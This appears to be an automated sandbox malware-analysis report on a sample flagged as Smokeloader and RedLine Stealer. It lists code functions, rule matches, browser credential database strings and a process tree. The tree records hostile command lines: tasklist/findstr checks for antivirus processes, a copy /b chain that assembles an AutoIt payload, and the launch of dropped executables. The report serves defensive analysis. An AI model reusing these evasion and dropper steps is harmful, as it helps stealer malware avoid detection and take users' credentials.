                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C17B82016_2_6C17B820
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C18482016_2_6C184820
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C15885016_2_6C158850
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C15D85016_2_6C15D850
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C17F07016_2_6C17F070
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1660A016_2_6C1660A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1A50C716_2_6C1A50C7
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C15C0E016_2_6C15C0E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1758E016_2_6C1758E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C15A94016_2_6C15A940
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C18B97016_2_6C18B970
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1AB17016_2_6C1AB170
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C14D96016_2_6C14D960
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C17519016_2_6C175190
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C19299016_2_6C192990
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C16D9B016_2_6C16D9B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13C9A016_2_6C13C9A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C179A6016_2_6C179A60
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1ABA9016_2_6C1ABA90
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C14CAB016_2_6C14CAB0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1A2AB016_2_6C1A2AB0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1322A016_2_6C1322A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C164AA016_2_6C164AA0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C178AC016_2_6C178AC0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C151AF016_2_6C151AF0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C17E2F016_2_6C17E2F0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C17D32016_2_6C17D320
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13534016_2_6C135340
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C14C37016_2_6C14C370
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13F38016_2_6C13F380
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1A53C816_2_6C1A53C8
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2BAC3016_2_6C2BAC30
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2A6C0016_2_6C2A6C00
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1EAC6016_2_6C1EAC60
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1DECC016_2_6C1DECC0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C23ECD016_2_6C23ECD0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C368D2016_2_6C368D20
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2AED7016_2_6C2AED70
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C30AD5016_2_6C30AD50
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1E4DB016_2_6C1E4DB0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C276D9016_2_6C276D90
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C36CDC016_2_6C36CDC0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2C0E2016_2_6C2C0E20
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C27EE7016_2_6C27EE70
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C266E9016_2_6C266E90
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1EAEC016_2_6C1EAEC0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C280EC016_2_6C280EC0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1E6F1016_2_6C1E6F10
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C320F2016_2_6C320F20
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2A2F7016_2_6C2A2F70
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C24EF4016_2_6C24EF40
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C328FB016_2_6C328FB0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1EEFB016_2_6C1EEFB0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2BEFF016_2_6C2BEFF0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1E0FE016_2_6C1E0FE0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C23082016_2_6C230820
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C26A82016_2_6C26A820
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2B484016_2_6C2B4840
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2E68E016_2_6C2E68E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C23690016_2_6C236900
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C21896016_2_6C218960
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2709A016_2_6C2709A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C29A9A016_2_6C29A9A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2A09B016_2_6C2A09B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2FC9E016_2_6C2FC9E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2149F016_2_6C2149F0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C298A3016_2_6C298A30
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C28EA0016_2_6C28EA00
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C25CA7016_2_6C25CA70
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C25EA8016_2_6C25EA80
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C280BA016_2_6C280BA0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2E6BE016_2_6C2E6BE0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C24442016_2_6C244420
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C26A43016_2_6C26A430
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1F846016_2_6C1F8460
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C30A48016_2_6C30A480
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2264D016_2_6C2264D0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C27A4D016_2_6C27A4D0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C24256016_2_6C242560
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C28057016_2_6C280570
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C32855016_2_6C328550
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C23854016_2_6C238540
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2E454016_2_6C2E4540
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1D45B016_2_6C1D45B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2AA5E016_2_6C2AA5E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C26E5F016_2_6C26E5F0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C23C65016_2_6C23C650
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C23E6E016_2_6C23E6E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C27E6E016_2_6C27E6E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2046D016_2_6C2046D0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 6C36DAE0 appears 39 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 6C36D930 appears 31 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 6C1794D0 appears 90 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 6C209B10 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 6C16CBE8 appears 134 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 6C203620 appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: String function: 6C3609D0 appears 149 times
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: String function: 004062A3 appears 57 times
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: String function: 00410A3A appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: String function: 00280D17 appears 70 times
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: String function: 00271A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: String function: 00410EE9 appears 129 times
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: String function: 00288B30 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: String function: 00411860 appears 55 times
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
                    Source: hlyG1m5UmO.exeStatic PE information: invalid certificate
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs hlyG1m5UmO.exe
                    Source: hlyG1m5UmO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000010.00000002.3347378928.00000000006B3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: ScreenUpdateSync[1].exe.15.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 1248.tmp.exe.15.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: hlyG1m5UmO.exeStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@48/101@2/4
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CA6AD GetLastError,FormatMessageW,15_2_002CA6AD
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002B8DE9 AdjustTokenPrivileges,CloseHandle,15_2_002B8DE9
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_002B9399
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,15_2_002C4148
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,15_2_002C443D
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6020
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifMutant created: \Sessions\1\BaseNamedObjects\prtscreen1566
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile created: C:\Users\user\AppData\Local\Temp\nsfA451.tmpJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat
                    Source: hlyG1m5UmO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: 1248.tmp.exe, 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.16.dr, nss3[1].dll.16.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: 1248.tmp.exe, 00000010.00000003.3134536778.000000000078D000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000003.3134178659.0000000020EB5000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000003.3123190963.0000000020E99000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGHDAECBGDGCAKE.16.dr, JEGHDAFIDGDAAKEBFHDA.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: 1248.tmp.exe, 00000010.00000002.3373228460.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.16.dr, softokn3.dll.16.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: hlyG1m5UmO.exeVirustotal: Detection: 10%
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile read: C:\Users\user\Desktop\hlyG1m5UmO.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\hlyG1m5UmO.exe "C:\Users\user\Desktop\hlyG1m5UmO.exe"
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 464151
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DHappenedWestminsterUnexpected" Heat
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo V
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Blank.pif V
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess created: C:\Users\user\AppData\Local\Temp\1248.tmp.exe "C:\Users\user\AppData\Local\Temp\1248.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 856
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 864
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 992
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1000
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1260
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2348
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2416
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2364
